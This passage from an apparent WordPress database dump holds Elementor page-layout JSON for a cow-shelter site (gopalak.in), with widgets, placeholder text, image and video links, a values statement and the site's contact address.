cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9207,1583,'_elementor_page_assets','a:0:{}'),(9209,1584,'_elementor_edit_mode','builder'),(9210,1584,'_elementor_template_type','wp-page'),(9211,1584,'_elementor_version','3.7.8'),(9212,1584,'_wp_page_template','elementor_canvas'),(9213,1584,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 